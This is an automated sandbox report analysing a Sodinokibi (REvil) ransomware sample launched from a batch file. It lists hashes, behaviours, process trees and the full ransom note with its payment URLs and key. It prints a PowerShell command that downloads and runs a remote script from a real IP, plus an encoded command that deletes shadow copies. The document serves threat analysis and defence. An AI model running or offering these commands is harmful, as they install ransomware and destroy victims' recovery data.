Analysis

  • max time kernel
    136s
  • max time network
    53s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    03-05-2020 01:10

General

  • Target

    LVUCdSAS.bat

  • Size

    191B

  • MD5

    4d0d0cde7b92c8b97f2729cb95f08d3a

  • SHA1

    b77bbf7812e9295554ae54b2c35ef5304904f0f5

  • SHA256

    b17a151185d86157579c7ecd1903ddfd186f78f1b49899efefda2e943a6b755e

  • SHA512

    5ab25f6b4ed8e39c876b939e28848546586c43d4349cd460dd9ed0948b495a000e8e237e0a67f8d14c6f23e88643eac89099c27169926106b91a1ab48bf7c706

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/LVUCdSAS

Extracted

Path

C:\59t0ty8-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 59t0ty8. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/099343EE9A6C9A82 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/099343EE9A6C9A82 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: RTzvfBiknP3SVjsuwff/wh0jyBcB00O6q1C8AcgKDmnJkSJLna5uxrAZu+ax/cyA JYC8RlDx+iF0AHI3EWYAEhcKa6jIcoMR0x2sUd5q4hlDD+wUYPMYgKNNhdMY56xr 6w9DwkFaWyvpu9DCAu5S1TvZ6LT4h25KC+sor2ORskrqAPdEVqNS+mZ0tsfn/gpZ jfloolaCzw4rr41k+uXIiqLZGTLqlm9HYzojqrTG7ST4lpE6Al4y+cWnlhn1tzlg mA62y8Wz8a008VO22wEYQc/72gHZcvebs39HAYV3r02IshGGgWRvl9I+jAqA97Pr U0rCoHxRPXSiWVR/Ozvzhk5PViOl8WQbyYxT57OwIJQ/xiEJvmBkvlqF6iOcsvaR 38V80EsRN0mNPQAXvWY6oiWtQK+9OUpTvwJ9ediKu16WBj/yf7u/DXyb9e9Z4//4 9oFcqCDW5XwYAUhCIYnRT2YIuairBim5ep7x31v4cIYuR/1Tfh4HS0FQ2hJZBEA3 shPN8o9Sh1dhqb5726LgsN9fRRD04nYOoT17mumq4C2Qx/3ALGVNRXCfO9+rmXCK +0WeoawE2rFHcV7ae6vl9vk1PmkF/yhxGpafEB7Xo5S8yTE2BLo/ty+1lTllGX3J UG7JG9juQy9ttBZu1ZoH94pIiw1J1rh+X06LgHilB5lvLlEAge66EYTZ/Jzxt8TS wsmiRTg8Beb/3ijvAmrpHfq6jRVksaK2lpYDiyqES0T+kBpHsa6UGEKvq22iUeAX GOXECs3QeBFEOuALsQBIN0Uv7DxLZQltqWG20R3eGgdc8Jd/3C7fW0DlHylmOGXl tf17VDeVqSkFqXBow3eiy/RqrCXMNKKBTzfsC73hYwFAf6WfGbPsapmLTrEc7vLS LHqCSeOrpT+Xt/pDmjfxq0XBiGlMmGaTd5ScXE8b1uQ5rFEUNlpQbZTzpZHH3xfQ xq8Ydvy7/6DkXrKNnBBUN9Jo6hkSlfV4yaQPQHPglXFG4zpcOwub+y1R0Dcgf/31 sbPoi3Q+XYK2kVhU+xAGwCyuUlpeadwsscPxjxUp5pD/QtwPFkcpJYAf1WbhO/+G rEGvIh38adqB001vVqkhYrm1finw39xe2ZdMNkNibOK/rb75Y6Ih1i8VK/4+J+y2 2seB7O8lR7B43meVx59UjtZPr2sbJxIgKbTgkg5bjtLbdk3NxjjCaLnr0wzuO5os CEYU+9F4LIzvOXEOJZDcD7E6uWB2bDCwUcnAuHBa9OhMWMNEd+qUm2ogKTCFgrIP ygOA9AH52+M2o1gIjmYi3qJBbGgUlFKr1ITr92GU5cGWhQ== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/099343EE9A6C9A82

http://decryptor.cc/099343EE9A6C9A82

Signatures

  • Enumerates connected drives 3 TTPs
  • Makes http(s) request 1 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 26 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\LVUCdSAS.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/LVUCdSAS');Invoke-KTVNSBAG;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1480
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1696
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:752

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms